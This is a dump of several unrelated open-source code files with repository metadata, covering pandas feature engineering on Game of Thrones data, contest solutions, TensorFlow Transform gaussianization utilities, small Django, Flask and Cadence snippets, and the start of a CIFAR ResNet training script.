df['alive_by_age'] = df.apply(conditions, axis=1)
print(df['alive_by_age'].sum())
# Filling the missing values with -1
df['300year_vs_dob'] = df['300year_vs_dob'].fillna(-1)
# Filling the missing value with -1 to
fill = -1
df.alive_by_age = df.alive_by_age.fillna(fill)
# Filing the NA's with -1 to analyze the distribution afterwards
fill = -1
df['age'] = df['age'].fillna(fill)
# Creating a new colum without the Nas values of the age
df['out_age'] = df['age'][df['age'] != -1]
df['out_age'] = df['out_age'].fillna(0)
# Analysing the distribution of the ages
df_age = df.age.dropna()
fig, ax = plt.subplots(figsize=(20,10))
sns.distplot(df_age)
plt.show()
fig, ax = plt.subplots(figsize=(20,10))
sns.distplot(df.age)
plt.show()
# Filling NAs with the median
df['age'][df['age'] == -1] = 27
# Filling the NAs with the median to analyse the distribution afterwards
fill = -1
df['DOB'] = df['DOB'].fillna(fill)
# Creating a new colum without the NA values of the DOB
df['out_DOB'] = df['DOB'][df['DOB'] != -1]
df['out_DOB'] = df['out_DOB'].fillna(0)
df.DOB.describe()
df_DOB = df.DOB.dropna()
fig, ax = plt.subplots(figsize=(20,10))
sns.distplot(df_DOB)
plt.show()
# filling NAs with the median
df['DOB'][df['DOB'] == -1] = 268
'''
Creating a new column with the sum of age and DOB, if the result != 305 then
the character is not alive.
'''
df['out_year'] = df.DOB + df.age
##########################################################
# Analysing Number of dead relatives and popularity
##########################################################
# Flagging Missing Values
print(df.numDeadRelations.isna().sum())
print(df.popularity.isna().sum())
# distribution of dead relatives
print(df.numDeadRelations.value_counts())
# checking the correlation between dead relatives and being alive
np.corrcoef(x = df['numDeadRelations'] , y = df['isAlive'])
'''
It shows a very weak negative correlation between the number of dead relatives
and being alive
I'm creating a dummy variable for the number of read relatives, where if the
character has 0 dead relatives, it will flag as 1.
'''
dead_relations_zero = 0
df['out_deadrelations'] = 0
df.loc[ : , 'out_deadrelations'][df.loc[ : , 'numDeadRelations'] !=
dead_relations_zero] = 1
# Exploring the popularity
print(df.popularity.describe())
# Analysing the distribution
fig, ax = plt.subplots(figsize=(20,10))
sns.distplot(df['popularity'])
plt.show()
sns.lmplot(x = 'popularity',
y = 'isAlive',
data = df
)
plt.show()
# Checking the correlation with being alive
np.corrcoef(x = df['popularity'], y = df['isAlive'])
'''
I'm going to create a new column only with the most popular characters.
Checking the distribution of according to the quantiles.
'''
df['popularity'].quantile([0.25,
0.50,
0.75,
0.80,
0.90,
0.95
])
df_popularity = (df.loc[ : , ['name',
'house',
'popularity',
'isAlive']]
[df['popularity'] >= 0.3]
)
print(df_popularity.describe())
print(np.corrcoef(x=df_popularity['popularity'],
y = df_popularity['isAlive']
))
# Creating a new column only with characters >= 0.3 of popularity.
df['out_popular'] = 0
df['out_popular'][df['popularity'] >= 0.3] = 1
df_corr = df.loc[:, ['out_age', 'out_DOB', 'out_year', 'alive_by_age']
].corr().round(2)
###############################################################################
# Dataset is ready for the models
###############################################################################
df.to_excel('got.xlsx')
| [
"[email protected]"
]
| |
23c0dd25543411644e979a4ed4368b85c6f49098 | 4dbaea97b6b6ba4f94f8996b60734888b163f69a | /LeetCode/8.py | 15f59ed2df0e448995c3a574ba4fa386c04f4725 | []
| no_license | Ph0en1xGSeek/ACM | 099954dedfccd6e87767acb5d39780d04932fc63 | b6730843ab0455ac72b857c0dff1094df0ae40f5 | refs/heads/master | 2022-10-25T09:15:41.614817 | 2022-10-04T12:17:11 | 2022-10-04T12:17:11 | 63,936,497 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | class Solution(object):
def myAtoi(self, str):
"""
:type str: str
:rtype: int
"""
import re
minus = 1
if len(str) == 0:
return 0
str = str.strip()
i = 0
while i < len(str):
if i == 0 and (str[i] == '-' or str[i] == '+') and minus == 1:
minus = -1
elif str[i] not in ['0','1','2','3','4','5','6','7','8','9']:
break
i += 1
if i == 0 or (i == 1 and minus == -1):
return 0
res = int(str[0:i])
res = min(res, 2147483647)
res = max(res, -2147483648)
return res | [
"[email protected]"
]
| |
1f29a592c39022e79242a176b8638f31728d0fba | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_207/190.py | 4ea85e66ef60f663dfa02f1f700dbd13bd15454c | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,505 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from heapq import *
def read_ints():
return list(map(int, input().split()))
def solve(t):
N, r, o, y, g, b, v = read_ints()
if r == g != 0:
if o or y or b or v:
print('Case #{}: IMPOSSIBLE'.format(t))
else:
print('Case #{}: {}'.format(t, 'RG'*r))
return
if y == v != 0:
if r or o or g or b:
print('Case #{}: IMPOSSIBLE'.format(t))
else:
print('Case #{}: {}'.format(t, 'VY'*y))
return
if b == o != 0:
if r or y or g or v:
print('Case #{}: IMPOSSIBLE'.format(t))
else:
print('Case #{}: {}'.format(t, 'OB'*b))
return
r -= g
y -= v
b -= o
if r < 0 or y < 0 or b < 0:
print('Case #{}: IMPOSSIBLE'.format(t))
return
M = max(r, y, b)
h = [(-r, r != M, 'R'), (-y, y != M, 'Y'), (-b, b != M, 'B')]
heapify(h)
res = ''
count, _prio, ch = heappop(h)
while count < 0:
res += ch
count, _prio, ch = heapreplace(h, (count + 1, _prio, ch))
if res[-1] != res[0] and all(count == 0 for count, *_ in h):
res = res.replace('R', 'RG'*g + 'R', 1)
res = res.replace('Y', 'YV'*v + 'Y', 1)
res = res.replace('B', 'BO'*o + 'B', 1)
print('Case #{}: {}'.format(t, res))
else:
print('Case #{}: IMPOSSIBLE'.format(t))
if __name__ == "__main__":
for t in range(1, int(input())+1):
solve(t)
| [
"[email protected]"
]
| |
6f93021be2e728eb052b23276ba667565f0f0bb7 | 872ea32f551c803ac497a38667dc272965246561 | /tensorflow_transform/gaussianization.py | 320acb6f67fcda13b616b72cb43fb36c878774ab | [
"Apache-2.0"
]
| permissive | tensorflow/transform | 5c4d74c15e7a13ef0901816dfe35b0901d6cb1da | d2bfc2640137324dcad7f7be365e6c851c01f4e9 | refs/heads/master | 2023-08-31T21:54:54.222760 | 2023-08-15T22:45:45 | 2023-08-15T22:46:20 | 81,509,390 | 1,030 | 267 | Apache-2.0 | 2023-08-11T22:57:56 | 2017-02-10T00:36:53 | Python | UTF-8 | Python | false | false | 13,792 | py | # Copyright 2020 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities used to compute parameters for gaussianization."""
import numpy as np
import tensorflow as tf
# The expressions to compute the first L-moments from the parameters of the
# Tukey HH distribution are taken from:
# Todd C. Headrick, and Mohan D. Pant. "Characterizing Tukey h and
# hh-Distributions through L-Moments and the L-Correlation," ISRN Applied
# Mathematics, vol. 2012, 2012. doi:10.5402/2012/980153
def tukey_hh_l_mean_and_scale(h_params):
"""Computes L-mean and L-scale for a Tukey HH distribution.
Args:
h_params: An np.array with dimension 2 on the first axis. The slice
h_params[0, ...] contains the left parameter of the distribution and
      h_params[1, ...] the right parameter. Each entry h must be in
      0 <= h < 1.
Returns:
The tuple (L_mean, L_scale) containing the first two L-moments for the
given parameters. Each entry has the same shape as h_params, except for
the first axis, which is removed.
"""
one_div_sqrt2pi = 1.0 / np.sqrt(2.0 * np.pi)
hl = h_params[0, ...]
hr = h_params[1, ...]
dtype = h_params.dtype
l_1 = one_div_sqrt2pi * (1.0 / (hl - 1.0) + 1.0 / (1.0 - hr))
l_2 = one_div_sqrt2pi * (
(np.sqrt(2.0 - hl) + np.sqrt(2.0 - hr) - hl * np.sqrt(2.0 - hl) -
hr * np.sqrt(2 - hr)) /
((hl - 1.0) * (hr - 1.0) * np.sqrt((hl - 2.0) * (hr - 2.0))))
return (l_1.astype(dtype), l_2.astype(dtype))
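# Illustrative usage of tukey_hh_l_mean_and_scale (a sketch, not part of the
# library API; the parameter values below are arbitrary):
#
#   h_params = np.array([[0.0], [0.5]])  # hl = 0 (left), hr = 0.5 (right).
#   l_mean, l_scale = tukey_hh_l_mean_and_scale(h_params)
#
# Here l_mean > 0 because the right tail (hr) is heavier than the left one;
# for hl = hr = 0 the distribution is a standard Gaussian, so l_mean = 0 and
# l_scale = 1 / sqrt(pi) ~= 0.5642.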
def _tukey_hh_l_skewness_and_kurtosis(h_params):
"""Computes L-skewness and L-kurtosis for a Tukey HH distribution.
Args:
h_params: An np.array with dimension 2 on the first axis. The slice
h_params[0, ...] contains the left parameter of the distribution and
h_params[1, ...] the right parameter.
Returns:
The tuple (L_skewness, L_kurtosis) for the given parameters. Each entry
has the same shape as h_params, except for the first axis, which is
removed.
"""
def skewness_num(h1, h2):
return (12 * np.sqrt(2.0 - h1) * (h2 - 2.0) * (h2 - 1.0) *
np.arctan(1.0 / np.sqrt(2.0 - h1)))
def skewness_den(h):
return h * np.sqrt(2 - h) - np.sqrt(2 - h)
def kurtosis_den_part(h):
return h * np.sqrt(2.0 - h) - np.sqrt(2.0 - h)
hl = h_params[0, ...]
hr = h_params[1, ...]
dtype = h_params.dtype
skewness = (skewness_num(hl, hr) -
np.pi * (hl - hr) * (hl - 2.0) * (hr - 2.0) -
skewness_num(hr, hl)) / (
2 * np.pi * np.sqrt((hl - 2.0) * (hr - 2.0)) *
(skewness_den(hl) + skewness_den(hr)))
kurtosis_num_1 = (
hr * np.sqrt((hl - 4.0) * (hl - 2.0) * (hl - 1.0) * (hr - 2.0)) -
2.0 * np.sqrt((hl - 4.0) * (hl - 1.0)))
kurtosis_num_2 = (hl * (hl - 3.0) * np.sqrt((hl - 4.0) * (hl - 1.0)) +
np.sqrt((hl - 4.0) * (hl - 2.0) * (hl - 1.0) * (hr - 2.0)))
kurtosis_num_3 = (30.0 * (hl - 1.0) *
np.sqrt((hl - 4.0) * (hl - 2.0) * (hr - 2.0) / (hl - 1.0)) *
(hr - 1.0) * np.arctan(np.sqrt(1.0 + 2.0 / (hl - 4.0))))
kurtosis_num_4 = (30.0 * (hl - 2) *
np.sqrt((hl - 4.0) * (hl - 1.0)) * (hl - 1.0) *
np.arctan(np.sqrt(1.0 + 2.0 / (hr - 4.0))))
kurtosis_den = (np.pi * np.sqrt((4.0 - hl) * (2.0 - hl) * (1.0 - hl)) *
(kurtosis_den_part(hl) + kurtosis_den_part(hr)))
kurtosis = (6.0 * np.pi * (kurtosis_num_1 - kurtosis_num_2) +
kurtosis_num_3 + kurtosis_num_4) / kurtosis_den
return (skewness.astype(dtype), kurtosis.astype(dtype))
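# Illustrative check of _tukey_hh_l_skewness_and_kurtosis (a sketch; the
# values follow from the closed forms above):
#
#   skew, kurt = _tukey_hh_l_skewness_and_kurtosis(np.zeros(2))
#
# With hl = hr = 0 (a standard Gaussian), skew is 0 by symmetry and kurt is
# ~= 0.1226, the L-kurtosis of a Gaussian; compute_tukey_hh_params below uses
# this value as its threshold.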
def _binary_search(error_fn, low_value, high_value):
"""Binary search for a function given start and end interval.
This is a simple binary search over the values of the function error_fn given
the interval [low_value, high_value]. We expect that the starting condition is
  error_fn(low_value) < 0 and error_fn(high_value) > 0, and we bisect the
  interval until the exit conditions are met. The result is the final interval
  [low_value, high_value], which is normally much smaller than the initial one
  but still satisfies the starting condition.
Args:
error_fn: Function mapping values to errors.
low_value: Lower interval endpoint. We expect f(low_value) < 0.
high_value: Higher interval endpoint. We expect f(high_value) > 0.
Returns:
The final interval endpoints (low_value, high_value) after the sequence of
bisections.
"""
# Exit conditions.
stop_iter_step = 10 # Max number of iterations.
stop_error_step = 1e-6 # Minimum function variation.
stop_value_step = 1e-6 # Minimum variable variation.
current_iter = 0
while True:
current_value = (low_value + high_value) / 2.0
current_error = error_fn(current_value)
if current_error < 0.0:
low_value = current_value
else:
high_value = current_value
current_iter += 1
if (current_iter > stop_iter_step or
np.abs(current_error) < stop_error_step or
high_value - low_value < stop_value_step):
break
return low_value, high_value
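# Illustrative usage of _binary_search (a sketch with an arbitrary function
# chosen for this example):
#
#   error_fn = lambda v: v * v - 2.0  # Negative below sqrt(2), positive above.
#   low, high = _binary_search(error_fn, 0.0, 2.0)
#
# The returned interval [low, high] brackets sqrt(2) ~= 1.4142 and satisfies
# error_fn(low) < 0 <= error_fn(high).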
def _params_to_errors(h, delta_h, l_skewness_and_kurtosis):
"""Maps parameters to errors on L-skewness and L-kurtosis.
Args:
h: Value of right parameter of the Tukey HH distribution.
    delta_h: Difference between the right and left parameters of the Tukey HH
distribution.
l_skewness_and_kurtosis: np.array containing the target values of
L-skewness and L-kurtosis.
Returns:
An np.array containing the difference between the values of L-skewness and
L-kurtosis corresponding to the parameters hl = h - delta_h, hr =h and the
target values.
"""
dtype = l_skewness_and_kurtosis.dtype
h_params = np.array([h - delta_h, h], dtype=dtype)
current_l_skewness_and_kurtosis = np.array(
_tukey_hh_l_skewness_and_kurtosis(h_params), dtype=dtype)
return current_l_skewness_and_kurtosis - l_skewness_and_kurtosis
def compute_tukey_hh_params(l_skewness_and_kurtosis):
"""Computes the H paramesters of a Tukey HH distribution.
Given the L-skewness and L-kurtosis of a Tukey HH distribution we compute
the H parameters of the distribution.
Args:
l_skewness_and_kurtosis: A np.array with shape (2,) containing L-skewness
and L-kurtosis.
Returns:
An np.array with the same type and shape of the argument containing the
left and right H parameters of the distribution.
"""
# Exit conditions for the search loop.
stop_iter_step = 20 # Max number of iteration for the search loop.
stop_error_step = 1e-6 # Minimum function variation.
stop_value_step = 1e-6 # Minimum variable variation.
dtype = l_skewness_and_kurtosis.dtype
  # Return zero parameters (i.e. treat as Gaussian) if L-kurtosis is smaller
  # than that of a Gaussian.
result = np.zeros_like(l_skewness_and_kurtosis)
if l_skewness_and_kurtosis[1] < 0.1226017:
return result
# If L-skewness is negative, swap the parameters.
swap_params = False
if l_skewness_and_kurtosis[0] < 0.0:
l_skewness_and_kurtosis[0] = -l_skewness_and_kurtosis[0]
swap_params = True
l_skewness_and_kurtosis[1] = np.minimum(
l_skewness_and_kurtosis[1], 1.0 - 1.0e-5)
  # If L-skewness is zero, left and right parameters are equal and there is a
  # closed form to compute them from L-kurtosis. We start from this value
  # and then change them to match simultaneously L-skewness and L-kurtosis.
  # For that, we parametrize the search space with the array
  # [h_right, h_right - h_left], i.e. the value of the right parameter and the
  # difference right minus left parameters. In the search iteration, we
  # alternate between updates on the first and the second entry of the search
  # parameters.
initial_h = 3.0 - 1.0 / np.cos(
np.pi / 15.0 * (l_skewness_and_kurtosis[1] - 6.0))
search_params = np.array([initial_h, 0.0], dtype=dtype)
# Current lower and upper bounds for the search parameters.
min_search_params = np.array([initial_h, 0.0], dtype=dtype)
max_search_params = np.array([1.0 - 1.0e-7, initial_h], dtype=dtype)
current_iter = 0
previous_search_params = np.zeros_like(search_params)
while current_iter < stop_iter_step:
# Search for L-skewness at constant h. Increase delta_h.
error_skewness = lambda x: _params_to_errors( # pylint: disable=g-long-lambda
search_params[0], x, l_skewness_and_kurtosis)[0]
if error_skewness(max_search_params[1]) > 0.0:
low_delta_h, high_delta_h = _binary_search(
error_skewness, min_search_params[1], max_search_params[1])
search_params[1] = high_delta_h
max_search_params[1] = high_delta_h # The new delta is an upperbound.
upperbound_delta_found = True
else:
search_params[1] = max_search_params[1]
min_search_params[1] = max_search_params[1] # No solution: lowerbound.
upperbound_delta_found = False
# Search for L-kurtosis at constant possibly overestimated delta.
error_kurtosis = lambda x: _params_to_errors( # pylint: disable=g-long-lambda
x, search_params[1], l_skewness_and_kurtosis)[1]
low_h, high_h = _binary_search(
error_kurtosis, min_search_params[0], max_search_params[0])
if upperbound_delta_found:
search_params[0] = high_h
max_search_params[0] = high_h # Delta overestimated: upperbound for h.
else:
search_params[0] = low_h
min_search_params[0] = low_h # Delta underestimated: lowerbound for h.
max_search_params[1] = low_h # Delta not found, search on full range.
if upperbound_delta_found: # If not found, we repeat the first 2 steps.
# Otherwise, Search for delta at constant overestimated h.
error_skewness = lambda x: _params_to_errors( # pylint: disable=g-long-lambda
search_params[0], x, l_skewness_and_kurtosis)[0]
low_delta_h, high_delta_h = _binary_search(
error_skewness, min_search_params[1], max_search_params[1])
search_params[1] = low_delta_h
min_search_params[1] = low_delta_h
# Search for h at constant delta.
error_kurtosis = lambda x: _params_to_errors( # pylint: disable=g-long-lambda
x, search_params[1], l_skewness_and_kurtosis)[1]
low_h, high_h = _binary_search(
error_kurtosis, min_search_params[0], max_search_params[0])
search_params[0] = low_h
min_search_params[0] = low_h
current_error = _params_to_errors(
search_params[0], search_params[1], l_skewness_and_kurtosis)
delta_search_params = search_params - previous_search_params
current_iter += 1
previous_search_params = search_params.copy()
if (np.all(np.abs(current_error) < stop_error_step) or
np.all(np.abs(delta_search_params) < stop_value_step)):
break
result[0] = search_params[0] - search_params[1]
result[1] = search_params[0]
if swap_params:
result = result[::-1]
return result
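# Usage sketch (added example; the L-moment values below are illustrative only,
# chosen inside the valid region where L-kurtosis > 0.1226017):
#   target = np.array([0.1, 0.3])            # [L-skewness, L-kurtosis]
#   hl, hr = compute_tukey_hh_params(target.copy())
# Note that compute_tukey_hh_params may modify its argument in place (sign
# flip and clipping), hence the defensive copy.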
def lambert_w(x):
"""Computes the Lambert W function of a `Tensor`.
Computes the principal branch of the Lambert W function, i.e. the value w such
  that w * exp(w) = x for a given x. For the principal branch, x must be real with
x >= -1 / e, and w >= -1.
Args:
x: A `Tensor` containing the values for which the principal branch of
the Lambert W function is computed.
Returns:
A `Tensor` with the same shape and dtype as x containing the value of the
Lambert W function.
"""
dtype = x.dtype
e = tf.constant(np.exp(1.0), dtype)
inv_e = tf.constant(np.exp(-1.0), dtype)
s = (np.exp(1) - 1.0) / (np.exp(2) - 1.0)
slope = tf.constant(s, dtype)
c = tf.constant(1 / np.exp(1) * (1 - s), dtype)
log_s = tf.math.log(x)
w_init = tf.where(
x < inv_e,
x,
tf.where(x < e,
slope * x + c,
(log_s + (1.0 / log_s - 1.0) * tf.math.log(log_s))))
def newton_update(count, w):
expw = tf.math.exp(w)
wexpw = w * expw
return count + 1, w - (wexpw - x) / (expw + wexpw)
count = tf.constant(0, tf.int32)
num_iter = tf.constant(8)
(unused_final_count, w) = tf.while_loop(
lambda count, w: tf.less(count, num_iter),
newton_update,
[count, w_init])
return w
def inverse_tukey_hh(x, hl, hr):
"""Compute the inverse of the Tukey HH function.
The Tukey HH function transforms a standard Gaussian distribution into the
Tukey HH distribution and it's defined as:
x = u * exp(hl * u ^ 2) for u < 0 and x = u * exp(hr * u ^ 2) for u >= 0.
Given the values of x, this function computes the corresponding values of u.
Args:
x: The input `Tensor`.
hl: The "left" parameter of the distribution. It must have the same dtype
and shape of x (or a broadcastable shape) or be a scalar.
hr: The "right" parameter of the distribution. It must have the same dtype
and shape of x (or a broadcastable shape) or be a scalar.
Returns:
The inverse of the Tukey HH function.
"""
def one_side(x, h):
h_x_square = tf.multiply(h, tf.square(x))
return tf.where(
        # Prevents the 0 / 0 form for small values of x.
tf.less(h_x_square, 1.0e-7),
x, # The error is < 1e-14 for this case.
tf.sqrt(tf.divide(lambert_w(h_x_square), h)))
return tf.where(tf.less(x, 0.0), -one_side(-x, hl), one_side(x, hr))
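# Round-trip sketch (added example; assumes eager execution so tensors
# evaluate directly - under TF1-style graph mode, run inside a tf.Session):
#   u = tf.constant(np.linspace(-3.0, 3.0, 13), tf.float32)
#   hl, hr = 0.1, 0.2                        # illustrative parameter values
#   x = tf.where(u < 0.0, u * tf.exp(hl * tf.square(u)), u * tf.exp(hr * tf.square(u)))
#   u_back = inverse_tukey_hh(x, hl, hr)     # should recover u to ~1e-5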
| [
"[email protected]"
]
| |
052d38a9978790d336591664f52e5c60fcab85f1 | eb24f4e5ef940e6c1d1c45a9dcce4d78bb88e6a2 | /bin/info | ea8acf20e49bf7d7cce9770f4ad2b6c7b0ce3013 | [
"MIT"
]
| permissive | eukaryote/knowhow | f7f8674a00f235a85945e51c4a3bc785e8db35e2 | 276439680e4075300d8001cae4f03d199f473991 | refs/heads/master | 2021-03-12T20:16:42.675120 | 2018-07-14T17:23:45 | 2018-07-14T17:23:45 | 19,190,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,317 | #!/usr/bin/env python
# vim: set ft=python: fileencoding=utf8
"""Show information about the knowhow index.
Usage:
info
info -h | --help
Options:
-h --help Show this screen.
"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
import sys
from docopt import docopt
from knowhow.index import Index
def print_overview(index):
"""Print overview of index to stdout."""
_ix = index.ix
print("Index:", _ix.storage.folder)
print("Last updated:", index.last_modified(localize=True))
print("Repo size: %d snippet(s)" % _ix.doc_count())
print()
def print_details(index):
"""Print details of index to stdout."""
with index.ix.reader() as reader:
tags = (t.decode("utf-8") for t in reader.lexicon("tag"))
print("tags:", ", ".join(tags))
print("most frequent tags:")
for count, term in reader.most_frequent_terms("tag"):
print(" {0}: {1}".format(int(count), term.decode("utf-8")))
def main(_args):
"""Run 'info' main, printing overview and details of index to stdout."""
index = Index()
print_overview(index)
print_details(index)
return 0
if __name__ == "__main__":
sys.exit(main(docopt(__doc__)))
| [
"[email protected]"
]
| ||
1ced0778202d32bf5b35354803964d6939afc6ea | 9ac35a2327ca9fddcf55077be58a1babffd23bdd | /cadence/tests/test_errors.py | 6921b0a8d11e06f2d032e6cc1b4e6d0ef653cd7c | [
"MIT"
]
| permissive | meetchandan/cadence-python | f1eb987c135f620607a62495096a89494216d847 | cfd7a48e6da7c289c9ae0c29c94d12d2b05986e4 | refs/heads/master | 2022-12-14T12:46:32.364375 | 2020-09-16T15:50:55 | 2020-09-16T15:50:55 | 260,763,097 | 1 | 0 | MIT | 2020-09-16T15:48:14 | 2020-05-02T19:47:56 | Python | UTF-8 | Python | false | false | 1,347 | py | from unittest import TestCase
from cadence.errors import find_error, InternalServiceError, WorkflowExecutionAlreadyStartedError
from cadence.thrift import cadence_thrift
class TestError(TestCase):
def setUp(self) -> None:
self.internalServiceError = cadence_thrift.shared.InternalServiceError("ERROR")
self.sessionAlreadyExistError = cadence_thrift.shared.WorkflowExecutionAlreadyStartedError("ERROR", "REQUEST-ID",
"RUN-ID")
def test_internal_server_error(self):
response = cadence_thrift.WorkflowService.StartWorkflowExecution.response(
internalServiceError=self.internalServiceError)
error = find_error(response)
self.assertIsInstance(error, InternalServiceError)
self.assertEqual("ERROR", error.message)
def test_session_already_exists_error(self):
response = cadence_thrift.WorkflowService.StartWorkflowExecution.response(
sessionAlreadyExistError=self.sessionAlreadyExistError)
error = find_error(response)
self.assertIsInstance(error, WorkflowExecutionAlreadyStartedError)
self.assertEqual("ERROR", error.message)
self.assertEqual("REQUEST-ID", error.start_request_id)
self.assertEqual("RUN-ID", error.run_id)
| [
"[email protected]"
]
| |
81ffe4f0c99da01a74045b38ea2219a0ae603926 | c9c1280de0467b66c346211eaedc2065b6633e4f | /request/forms.py | 8e0d0e25875872132cf37e7432788c2de89575c1 | []
| no_license | myklll/ehub | 1d4cdba50617d7b8ecd848285fa57e589db716cb | 8d697afe125cdd7e85fce8116fc86a2e216d48d4 | refs/heads/master | 2021-10-07T10:02:16.838681 | 2016-05-07T07:41:04 | 2016-05-07T07:41:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 628 | py | from django import forms
from django.forms.models import inlineformset_factory
from .models import Request
from inquiry.models import *
class RequestForm(forms.ModelForm):
class Meta:
model = Request
exclude = ("listing","owner",)
#event = forms.ModelChoiceField(queryset=Inquiry.objects.filter(owner=kwargs.pop('user')))
def __init__(self, *args, **kwargs):
user = kwargs.pop('user')
super(RequestForm, self).__init__(*args, **kwargs)
qs = Inquiry.objects.filter(owner=user)
#self.fields['events'] = forms.ModelChoiceField(queryset=qs)
        self.fields['event'].queryset = qs
| [
"[email protected]"
]
| |
40f876fcc02752f5a490da1b62c9a5389df9746a | ef7984977e3470081339df3bee9105c16c79421d | /p1/app/__init__.py | 949fc65c867b0efb44713cc4f4d5a5fad74f89a9 | []
| no_license | stevenhughes08/PiBlog | d145d29f91161c401ce29da344159e8b2bd36264 | 9c93083d9bff4fe69116886d5c6d19ee917ec0a3 | refs/heads/master | 2020-12-01T15:53:38.627025 | 2020-01-03T03:06:57 | 2020-01-03T03:06:57 | 230,689,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | from flask import Flask
from config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
from app import routes, models
| [
"[email protected]"
]
| |
7249e9e066e96a76e820a257252789e68f35d811 | 3c8155ad1e44047b17231358d8a4f0df0ea8bfee | /Code/xNNs_Code_030_CIFAR_ResNetV2b.py | 1ed9a7c92cdb9d168304a3fb8a457b460a1ba12e | []
| no_license | nambiarvijay/UT-Dallas-CS-6301-CNNs | 91aab77f34797cdaa9e4aa216fc5c3daea8ea1e5 | d14039133cac9555e2e885fedd8e68c172a01623 | refs/heads/master | 2020-09-28T05:15:16.783852 | 2019-12-05T03:50:55 | 2019-12-05T03:50:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,352 | py | ################################################################################
#
# xNNs_Code_030_CIFAR_ResNetV2b.py
#
# DESCRIPTION
#
# TensorFlow image classification using CIFAR using a ResNetV2 based encoder
# with 2x the number of channels per layer relative to the ResNetV2 implemented
# in xNNs_Code_030_CIFAR_ResNetV2.py
#
# INSTRUCTIONS
#
# 1. Go to Google Colaboratory: https://colab.research.google.com/notebooks/welcome.ipynb
# 2. File - New Python 3 notebook
# 3. Cut and paste this file into the cell (feel free to divide into multiple cells)
# 4. Runtime - Change runtime type - Hardware accelerator - GPU
# 5. Runtime - Run all
#
# NOTES
#
# 1. This configuration achieves 93.0% accuracy in 60 epochs with each epoch
# taking ~ 140s on Google Colab. Accuracy can be improved via
# - Improved training data augmentation
# - Improved network design
# - Improved network training
#
# 2. Examples (currently commented out) are included for the following
# - Computing the dataset mean and std dev
# - Restarting training after a crash from the last saved checkpoint
# - Saving and loading the model in Keras H5 format
# - Saving and loading the model in TensorFlow SavedModel format
# - Getting a list of all feature maps
# - Creating an encoder only model
#
################################################################################
################################################################################
#
# IMPORT
#
################################################################################
# tensorflow 2.0 beta and tensorflow datasets
!pip install tensorflow-gpu==2.0.0-beta1
!pip install tensorflow-datasets
# tenorflow
import tensorflow as tf
from tensorflow import keras
# tensorflow datasets
import tensorflow_datasets as tfds
# additional libraries
import math
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
################################################################################
#
# PARAMETERS
#
################################################################################
# data
DATA_NUM_CLASSES = 10
DATA_CHANNELS = 3
DATA_ROWS = 32
DATA_COLS = 32
DATA_CROP_ROWS = 28
DATA_CROP_COLS = 28
DATA_MEAN = np.array([[[125.30691805, 122.95039414, 113.86538318]]]) # CIFAR10
DATA_STD_DEV = np.array([[[ 62.99321928, 62.08870764, 66.70489964]]]) # CIFAR10
# model
MODEL_LEVEL_0_BLOCKS = 4
MODEL_LEVEL_1_BLOCKS = 6
MODEL_LEVEL_2_BLOCKS = 3
# training
TRAINING_BATCH_SIZE = 32
TRAINING_SHUFFLE_BUFFER = 5000
TRAINING_BN_MOMENTUM = 0.99
TRAINING_BN_EPSILON = 0.001
TRAINING_LR_MAX = 0.001
# TRAINING_LR_SCALE = 0.1
# TRAINING_LR_EPOCHS = 2
TRAINING_LR_INIT_SCALE = 0.01
TRAINING_LR_INIT_EPOCHS = 5
TRAINING_LR_FINAL_SCALE = 0.01
TRAINING_LR_FINAL_EPOCHS = 55
# training (derived)
TRAINING_NUM_EPOCHS = TRAINING_LR_INIT_EPOCHS + TRAINING_LR_FINAL_EPOCHS
TRAINING_LR_INIT = TRAINING_LR_MAX*TRAINING_LR_INIT_SCALE
TRAINING_LR_FINAL = TRAINING_LR_MAX*TRAINING_LR_FINAL_SCALE
# saving
SAVE_MODEL_PATH = './save/model/'
!mkdir -p "$SAVE_MODEL_PATH"
################################################################################
#
# DATA
#
################################################################################
# pre processing for training data
def pre_processing_train(example):
# extract image and label from example
image = example["image"]
label = example["label"]
# image is cast to float32, normalized, augmented and random cropped
# label is cast to int32
image = tf.math.divide(tf.math.subtract(tf.dtypes.cast(image, tf.float32), DATA_MEAN), DATA_STD_DEV)
image = tf.image.random_flip_left_right(image)
image = tf.image.random_crop(image, size=[DATA_CROP_ROWS, DATA_CROP_COLS, 3])
label = tf.dtypes.cast(label, tf.int32)
# return image and label
return image, label
# pre processing for testing data
def pre_processing_test(example):
# extract image and label from example
image = example["image"]
label = example["label"]
# image is cast to float32, normalized, augmented and center cropped
# label is cast to int32
image = tf.math.divide(tf.math.subtract(tf.dtypes.cast(image, tf.float32), DATA_MEAN), DATA_STD_DEV)
image = tf.image.crop_to_bounding_box(image, (DATA_ROWS - DATA_CROP_ROWS) // 2, (DATA_COLS - DATA_CROP_COLS) // 2, DATA_CROP_ROWS, DATA_CROP_COLS)
label = tf.dtypes.cast(label, tf.int32)
# return image and label
return image, label
# download data and split into training and testing datasets
dataset_train, info = tfds.load("cifar10", split=tfds.Split.TRAIN, with_info=True)
dataset_test, info = tfds.load("cifar10", split=tfds.Split.TEST, with_info=True)
# debug - datasets
